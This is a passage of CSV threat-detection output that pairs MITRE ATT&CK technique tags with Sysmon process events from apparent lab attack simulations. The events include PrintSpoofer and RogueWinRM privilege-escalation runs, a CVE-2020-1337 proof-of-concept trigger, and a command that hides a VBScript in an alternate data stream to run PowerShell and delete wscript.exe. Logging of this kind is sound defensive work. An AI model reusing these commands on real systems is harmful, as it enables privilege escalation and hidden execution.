<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010ECCBC200</Data>
<Data Name=""ParentProcessId"">6760</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe</Data>
<Data Name=""ParentCommandLine"">PrintSpoofer.exe -i -c powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:54.867394Z"">
</TimeCreated>
<EventRecordID>110434</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:54.866</Data>
<Data Name=""ProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ProcessId"">1428</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010ECCBC200</Data>
<Data Name=""ParentProcessId"">6760</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe</Data>
<Data Name=""ParentCommandLine"">PrintSpoofer.exe -i -c powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:45.243751Z"">
</TimeCreated>
<EventRecordID>348</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:45.193</Data>
<Data Name=""ProcessGuid"">747F3D96-292D-5E1E-0000-0010F5597D00</Data>
<Data Name=""ProcessId"">3828</Data>
<Data Name=""Image"">C:\Windows\explorer.exe</Data>
<Data Name=""FileVersion"">10.0.17763.348 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Explorer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">EXPLORER.EXE</Data>
<Data Name=""CommandLine"">explorer ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-292D-5E1E-0000-0020CD587D00</Data>
<Data Name=""LogonId"">0x7d58cd</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:45.243751Z"">
</TimeCreated>
<EventRecordID>348</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:45.193</Data>
<Data Name=""ProcessGuid"">747F3D96-292D-5E1E-0000-0010F5597D00</Data>
<Data Name=""ProcessId"">3828</Data>
<Data Name=""Image"">C:\Windows\explorer.exe</Data>
<Data Name=""FileVersion"">10.0.17763.348 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Explorer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">EXPLORER.EXE</Data>
<Data Name=""CommandLine"">explorer ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-292D-5E1E-0000-0020CD587D00</Data>
<Data Name=""LogonId"">0x7d58cd</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-05T20:43:58.451314Z"">
</TimeCreated>
<EventRecordID>2164892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""6708"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-05 20:43:58.450</Data>
<Data Name=""ProcessGuid"">00247C92-858E-5F7B-0000-0010E741202B</Data>
<Data Name=""ProcessId"">6636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\windows\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
<Data Name=""LogonId"">0x391e334</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-858E-5F7B-0000-00105241202B</Data>
<Data Name=""ParentProcessId"">18404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\Taskmgr.exe</Data>
<Data Name=""ParentCommandLine"">C:\windows\system32\taskmgr.exe</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN &quot;Microsoft\Windows\Windows Error Reporting\QueueReporting&quot; &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:03.487498Z"">
</TimeCreated>
<EventRecordID>342414</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:03.484</Data>
<Data Name=""ProcessGuid"">747F3D96-E93B-5F33-0000-0010C1B40E00</Data>
<Data Name=""ProcessId"">7888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c schtasks /run /TN &quot;Microsoft\Windows\Windows Error Reporting\QueueReporting&quot; &gt; nul 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:45.087155Z"">
</TimeCreated>
<EventRecordID>243570</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:45.082</Data>
<Data Name=""ProcessGuid"">747F3D96-9F7D-5E75-0000-00104E062100</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9F77-5E75-0000-001090F32000</Data>
<Data Name=""ParentProcessId"">2416</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-24T01:13:50.327170Z"">
</TimeCreated>
<EventRecordID>196371</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2812"" ThreadID=""3656"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-24 01:13:50.301</Data>
<Data Name=""ProcessGuid"">747F3D96-CA4E-5EC9-0000-00109FE23700</Data>
<Data Name=""ProcessId"">1516</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-BDD1-5EC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-CA4B-5EC9-0000-0010B8CB3700</Data>
<Data Name=""ParentProcessId"">3960</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe</Data>
<Data Name=""ParentCommandLine"">RogueWinRM.exe -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:48.909935Z"">
</TimeCreated>
<EventRecordID>8114</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:48.894</Data>
<Data Name=""ProcessGuid"">365ABB72-3ED4-5D0B-0000-00106C871A00</Data>
<Data Name=""ProcessId"">888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;cmd&quot;</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
<Data Name=""LogonId"">0x13529</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
<Data Name=""ParentProcessId"">816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:02.552084Z"">
</TimeCreated>
<EventRecordID>342413</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:02.548</Data>
<Data Name=""ProcessGuid"">747F3D96-E93A-5F33-0000-001014B30E00</Data>
<Data Name=""ProcessId"">7868</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /C &quot;echo Dim objShell:Dim oFso:Set oFso = CreateObject(&quot;Scripting.FileSystemObject&quot;):Set objShell = WScript.CreateObject(&quot;WScript.Shell&quot;):command = &quot;powershell.exe&quot;:objShell.Run command, 0:command = &quot;C:\Windows\System32\cmd.exe /c &quot;&quot;start /b &quot;&quot;&quot;&quot; cmd /c &quot;&quot;timeout /t 5 &gt;nul&amp;&amp;del C:\Windows\wscript.exe&amp;&amp;del C:\Windows\wscript.exe.manifest&quot;&quot;&quot;&quot;&quot;:objShell.Run command, 0:Set objShell = Nothing &gt; &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-09T02:52:23.500263Z"">
</TimeCreated>
<EventRecordID>11238</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1988"" ThreadID=""228"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-09 02:52:23.484</Data>
<Data Name=""ProcessGuid"">365ABB72-95E7-5CD3-0000-001046950F00</Data>
<Data Name=""ProcessId"">2812</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /C &quot;echo Dim objShell:Dim oFso:Set oFso = CreateObject(&quot;Scripting.FileSystemObject&quot;):Set objShell = WScript.CreateObject(&quot;WScript.Shell&quot;):command = &quot;powershell.exe&quot;:objShell.Run command, 0:command = &quot;C:\Windows\System32\cmd.exe /c &quot;&quot;start /b &quot;&quot;&quot;&quot; cmd /c &quot;&quot;timeout /t 5 &gt;nul&amp;&amp;del C:\Windows\wscript.exe&amp;&amp;del C:\Windows\wscript.exe.manifest&quot;&quot;&quot;&quot;&quot;:objShell.Run command, 0:Set objShell = Nothing &gt; &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
<Data Name=""LogonId"">0x13add</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9570-5CD3-0000-00103FC90A00</Data>
<Data Name=""ParentProcessId"">1900</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
